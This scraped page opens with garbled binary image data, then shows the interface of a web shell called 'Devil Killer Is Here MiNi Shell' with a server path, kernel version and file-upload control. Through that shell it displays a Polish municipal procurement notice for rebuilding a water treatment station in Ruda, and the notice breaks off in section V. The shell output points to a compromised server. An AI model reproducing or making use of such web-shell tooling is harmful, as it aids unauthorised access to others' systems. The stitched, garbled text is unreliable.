JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241105/0057902401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa stacji uzdatniania wody w miejscowości Ruda </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dobrzyca</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobrzyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">62 74 13 013</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ugdobrzyca.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dobrzyca.bipgmina.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa stacji uzdatniania wody w miejscowości Ruda </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d6ced2d6-61de-4fa6-87a9-334194a91084</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00579024</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037165/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa stacji uzdatniania wody w miejscowości Ruda</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_dobrzyca <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_dobrzyca</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zostały zawarte w rozdziale XIV. SWZ Opis sposobu przygotowania ofert oraz dokumentów wymaganych przez Zamawiającego w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">TOŻSAMOŚĆ I DANE KONTAKTOWE ADMINISTRATORA<br/>Administratorem Pani/Pana danych osobowych jest Burmistrz Gminy Dobrzyca z siedzibą w Urzędzie Miejskim Gminy Dobrzyca przy ul. Rynek 14, 63-330 Dobrzyca. <br/>Z administratorem mogą się Państwo skontaktować poprzez adres email: gmina@ugdobrzyca.pl bądź pod wskazanym wyżej adresem.<br/>DANE KONTAKTOW INSPEKTORA OCHRONY DANYCH<br/>Z inspektorem ochrony danych można skontaktować się pisemnie – iod@bodo24.pl<br/>CEL I PODSTAWA PRAWNA PRZETWARZANIA DANYCH OSOBOWYCH<br/>Administrator będzie przetwarzał Pani/Pana dane osobowe w celu obowiązku prawnego nałożonego na administratora (art. 6 ust. 1 lit. c RODO) oraz w celu wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy (art. 6 ust. 1 lit b RODO) wynikającego z Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych w sprawie przeprowadzenia postępowania o udzielenie zamówienia publicznego w trybie podstawowym bez negocjacji na zadanie pn. Przebudowa stacji uzdatniania wody w miejscowości Ruda - ZPI.271.1.9.2024<br/>WYMOGI I KONSEKWENCJE<br/>Podanie danych osobowych jest wymogiem ustawowym. Osoba, której dane dotyczą jest zobowiązana do ich podania. Konsekwencją niepodania wymaganych danych jest brak możliwości udziału w postępowaniu o udzielenie zamówienia publicznego. <br/>INFORMACJE O ODBIORCACH DANYCH OSOBOWYCH<br/>Odbiorcami Państwa danych osobowych są lub mogą być:<br/>•	Inspektor Ochrony Danych Bartosz Mendyk z siedzibą ul. Sędomierska 2/3, 05-300 Mińsk Mazowiecki;<br/>•	właściwie upoważnione osoby fizyczne, prawne lub inni odbiorcy posiadający podstawę prawną żądania dostępu do danych osobowych oraz odbiorcy, którym muszą zostać ujawnione dane zgodnie z obowiązującymi przepisami prawa;<br/>podmioty obsługujące systemy teleinformatyczne, podmioty świadczące usługi pocztowe, kurierskie oraz prawne na rzecz Urzędu.<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie.<br/>CZAS PRZETWARZANIA DANYCH OSOBOWYCH<br/>Administrator będzie przechowywać Państwa dane osobowe do chwili załatwienia sprawy, a następie przez okres wynikający z zasad określonych w Rozporządzeniu z dnia 18 stycznia 2011 roku w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych.<br/>PRAWA OSÓB FIZYCZNYCH<br/>Przysługujące prawa:<br/>•	prawo do kopii danych i dostępu do informacji o przetwarzaniu;<br/>•	w uzasadnionych przypadkach prawo do sprostowania niepoprawnych bądź nieaktualnych danych osobowych;<br/>•	w uzasadnionych przypadkach prawo do usunięcia niepoprawnych bądź niepotrzebnych danych osobowych;<br/>•	w uzasadnionych przypadkach prawo do ograniczenia przetwarzania do momentu wykazania celu przetwarzania i zgodności z prawem;<br/>•	w uzasadnionych przypadkach prawo do wniesienia sprzeciwu w stosunku do przetwarzania związku ze szczególną sytuacja osoby fizycznej, której dane dotyczą;<br/>•	jeżeli decyzje w stosunku do danych osobowych będą podejmowane w sposób zautomatyzowany, to prawo do niepodlegania zautomatyzowanej decyzji;<br/>prawo do wniesienia skargi do organu nadzorczego. Organem nadzorczym w Polsce jest Prezes Urzędu Ochrony Danych Osobowych z siedzibą w Warszawie na ulicy Stawki 2i wszystkie dane kontaktowe znajdują się na platformie www.uodo.gov.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPI.271.1.9.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>Przebudowa stacji uzdatniania wody w miejscowości Ruda<br/>Przedmiotem zamówienia jest Przebudowa stacji uzdatniania wody w miejscowości Ruda zlokalizowanej na działce 171/17 obręb Lutynia, jednostka ewidencyjna Dobrzyca. Działka obecnie zabudowana jest obiektami technologicznymi przeznaczonymi do rozbiórki takimi jak: budynek technologiczny SUW wraz z istniejącym wyposażeniem technologicznym, odstojnik wód popłucznych, obudowa istniejącej studni, utwardzenie terenu (krawężniki, kostka brukowa), ogrodzenie oraz elementy zabawowe znajdujące się na wygrodzonej części działki. Inwestycja jest dofinansowana ze środków Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych Edycja 8. W ramach realizacji inwestycji zostaną wykonane dwa zadania. <br/>Przedmiot zamówienia obejmuje realizację dwóch niżej wymienionych zadań inwestycyjnych, które objęte są odrębną dokumentacją:<br/>1)	ZADANIE NR 1 – Przebudowa Stacji Uzdatniania Wody w miejscowości Ruda <br/>Przebudowa SUW w m. Ruda na dz. nr 171/17, obręb Lutynia obejmuje rozbiórkę istniejącego oraz budowę nowego obiektu służącego poborowi, uzdatnianiu i dystrybucji wody do gminnej sieci wodociągowej. Zakres robót: wymiana obudowy istniejącej studni głębinowej nr 1 z rozbiórką nasypu ziemnego wraz z uzbrojeniem (pompa głębinowa i pion toczny) oraz wykonaniem (przygotowaniem) obudowy dla planowanej w zadaniu nr 2 studni głębinowej nr 2 z uzbrojeniem; roboty ogólnobudowlane- rozbiórka istniejącego i budowę nowego budynku technologicznego SUW z płyt warstwowych dla zabudowy ciągu uzdatniania i dystrybucji wody z inst. wew. wod-kan, wentylacją i elektryczną, budowa klarownika-zbiornika nadziemnego o konstrukcji stalowej, średnicy 4,5 m wys. 9,3 m z orurowaniem i kanalizacją spustu i przelewu ze zbiorników, wykonania zbiornika pośredniego wody sklarowanej w konstrukcji stalowej o śr. 3 m i wys. 8,42 m, poj. 50,0 m3 z orurowaniem i kan. spustu i przelewu ze zbiorników, budowy 2 zbiorniki wyrównawcze wody o konstrukcji stalowej, nadziemnej, śr. wew. 4,50m, wysokości całkowitej 10,50m na fund. bet. o poj. 150m3 każdy, z orurowaniem i kan.; odstojnik wód popłucznych z orurowaniem o wym. 6,0x5,0 m i gł. 2,5 m z orurowaniem; rurociągi technologiczne międzyobiektowe wodno-kanalizacyjne; kanalizacji technologicznej ścieków z chlorowni zakończonej studzienką neutralizacyjną chloru(bezodpływową) oraz kan. sanitarnej zakończonej zbiornikiem na nieczystości ciekłe (szambem), wykonanie bloku technologicznego uzdatniania i dystrybucji wody wraz z niezbędnymi instalacjami w tym elektryczną, dostosowanie do pracy w trybie automatycznym, wykonanie fundamentu pod agregat prądotwórczy; zagospodarowanie terenu SUW: wykonanie dróg wewnętrznych z kostki betonowej, zieleni i ogrodzenia z bramą i furtką o wys. 1,5m, Roboty elektryczne- wykonanie nowego zasilania energetycznego dla obiektu z nowego złącza kablowo pomiarowego oraz kabli i przewodów energetycznych i sterowania pomiędzy poszczególnymi obiektami SUW, wyposażenie w agregat prądotwórczy w obudowie dźwiękochłonnej na fundamencie betonowym oraz wykonanie instalacji elektrycznej i AKPiA z systemem wizualizacji i zdalnego nadzoru i dostosowaniem obiektu do pracy w trybie automatycznym; oświetlenie wewnętrzne terenu SUW i monitoringu wizyjnego, ogrzewanie elektryczne obiektu, montaż mikroinstalacji fotowoltaicznej o mocy 30 kW. Zgodnie z dokumentacją projektową.<br/>Agregat prądotwórczy przeznaczony do pracy na zewnątrz w obudowie wyciszonej powinien posiadać zgodnie z dokumentacją projektową parametry nie gorsze niż:<br/>	Moc znamionowa 65kW,<br/>	Moc maksymalna do 15 min 72 kW,<br/>	Pełna izolacja zabudowy przed opadami atmosferycznymi,<br/>	Typ obudowy obudowa wyciszona,<br/>	Zbiornik paliwa pozwalający na 10 godzinną pracę agregatu przy obciążeniu maksymalnym (15-godzinna praca przy obciążeniu 70%). <br/>Mikroinstalacja fotowoltaiczna będzie się składać z 60 sztuk paneli fotowoltaicznych mocy 500 Wp z czego 36 paneli zamontowana zostanie na konstrukcjach wsporczych na dachu budynku Stacji Uzdatniania Wody oraz 24 panele na konstrukcjach wsporczych wkręconych w grunt zgodnie z projektem technicznym. Zastosowane panele będą współpracowały z falownikami. Instalacja fotowoltaiczna przyłączana będzie do rozdzielnicy SZR budynku. <br/><br/>2)	ZADANIE NR 2 – Wykonanie odwiertu ujęcia wody <br/>Przedmiotem zamówienia jest „ Budowa studni awaryjnej nr 2 w miejscowości Ruda”. Przedmiot zamówienia szczegółowo jest opisany w karcie informacyjnej przedsięwzięcia oraz projekcie robót geologicznych, które stanowią załącznik do SWZ.<br/>Planowana studnia awaryjna nr 2 będzie położona na terenie działki o nr ewid. 171/17 obręb: Lutynia Gmina Dobrzyca. Projektowaną studnię zlokalizowano w taki sposób, aby nie kolidowała z istniejącym zagospodarowaniem terenu.<br/>Planowane przedsięwzięcie będzie polegać na wykonaniu wiercenia otworu hydrogeologicznego do głębokości maksymalnej ok. 156 m i wykonaniu w nim studni, która będzie ujmować wodę do eksploatacji oraz na uzbrojeniu tego otworu (m.in. w głowicę studzienną, zawór zwrotny, wodomierz, zawór odcinający oraz zamontowaniu pompy studziennej) i wykonaniu jego obudowy studziennej. Obudowę studni planuje się wykonać w postaci obudowy nawierzchniowej typu Lange. Roboty należy wykonać zgodnie z zasadami wiedzy technicznej, sztuką budowlaną, warunkami technicznymi wykonania i odbioru robót budowlano-montażowych instalacji sanitarnych i przemysłowych. <br/>Zgodnie z dokumentacją zabudowę otworu należy wykonać z rur stalowych ze szwem oraz zastosować kolumnę filtracyjną ze stali nierdzewnej DN150 z filtrem ze szczeliną ciągłą typu Johnson. <br/>Dotyczy wszystkich wyżej wymienionych zadań:<br/>Wykonawca wykona cały przedmiot umowy zgodnie z dokumentacją projektową i pozwoleniem na budowę stanowiącymi załączniki do SWZ.<br/>Zamawiający pomocniczo w załącznikach przedkłada przedmiary robót. Jednakże podstawę obliczenia oferty stanowi dokumentacja projektowa. <br/>Wszelkie prace budowlane należy wykonać zgodnie z warunkami technicznymi, zasadami bhp obowiązującymi w budownictwie, a także zabezpieczyć teren przed dostępem osób niepowołanych oraz w miejscu widocznym umieścić tablice informacyjną budowy. <br/>Wymagany okres gwarancji udzielonej przez wykonawcę na roboty budowlane musi wynosić minimum 36 miesięcy od odebrania przez Zamawiającego robót budowlanych i podpisania protokołu końcowego. Gwarancja na urządzenia – według wytycznych producenta. <br/><br/>W kosztach realizacji inwestycji Wykonawca zobowiązany jest skalkulować zakup wraz z dostawą i montażem tablicy informacyjnej/pamiątkowej - wykonanie przez Wykonawcę i umieszczenie na miejscu realizacji inwestycji 1 tablicy informacyjnej i pamiątkowych odpornych na warunki atmosferyczne na stelażu matalowym zgodnych z wytycznymi instytucji dofinansowującej w ramach programu Polski Ład. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45252126-7 - Roboty budowlane w zakresie zakładów uzdatniania wody pitnej</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">31000000-6 - Maszyny, aparatura, urządzenia i wyroby elektryczne; oświetlenie</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45262220-9 - Wiercenie studni wodnych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">43134100-2 - Pompy zanurzeniowe</p> <p class="mb-0">45255110-3 - Roboty budowlane w zakresie studni</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">45223110-0 - Instalowanie konstrukcji metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>Lp.	Nazwa kryterium	Waga	Maksymalna liczba punktów jakie możne otrzymać oferta za dane kryterium<br/>1	Cena – „C” 60%	60 punktów<br/>2	Gwarancja „G”	40%	40 punktów<br/>Łączna liczba punktów	100 %	100 punktów<br/><br/>Ad. 1) Kryterium „Cena” <br/><br/>Cmin/Cb * 100* 60% = ilość punktów w kryterium C<br/>gdzie:<br/>Cmin – najniższa cena spośród ofert nieodrzuconych;<br/>Cb – cena oferty rozpatrywanej;<br/>100 – stały wskaźnik;<br/>60% - procentowe znaczenie kryterium ceny<br/><br/>Ad. 2) Kryterium „Gwarancja”<br/>Kryterium będzie oceniane na podstawie udzielonego okresu gwarancji w latach, na wykonane roboty budowlane.<br/>Na urządzenia wymagana jest gwarancja producenta. <br/>Go/Gm * 100* 40% = ilość punktów w kryterium G<br/>gdzie:<br/>Gm – liczba punktów przypisana do maksymalnego okresu gwarancji określonego w SWZ;<br/>Go – liczba punktów przypisana do oferowanego okresu gwarancji w ofercie rozpatrywanej<br/>100 – stały wskaźnik;<br/>40% - procentowe znaczenie kryterium „Gwarancja”.<br/>Zamawiający przyzna punkty Wykonawcom zgodnie z poniższą tabelą:<br/><br/>Minimum 3 lata – 36 miesięcy 0 pkt<br/>Minimum 4 lata – 48 miesięcy	10 pkt<br/>Minimum 5 lat – 60 miesięcy	20 pkt<br/>Minimum 6 lat – 72 miesiące	40 pkt<br/><br/>Uwaga: Minimalny oceniany okres gwarancji na roboty budowlane to 3 lata, a maksymalny to 6 lat. Wykonawca zobowiązany jest udzielić gwarancji na minimum 36 miesięcy, jeżeli Wykonawca na druku formularza ofertowego nie określi zobowiązania dotyczącego okresu gwarancji, Zamawiający uzna, że gwarancja została udzielona na okres 36 miesięcy.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów liczoną wg wzoru:<br/>LP= C+G<br/><br/>gdzie:<br/>LP – liczba zdobytych punktów;<br/>C – liczba punktów uzyskana (wyliczona) w kryterium „Cena ”;<br/>G – liczba punktów uzyskana (wyliczona) w kryterium „Gwarancja” <br/>2.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam wskaźnik oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 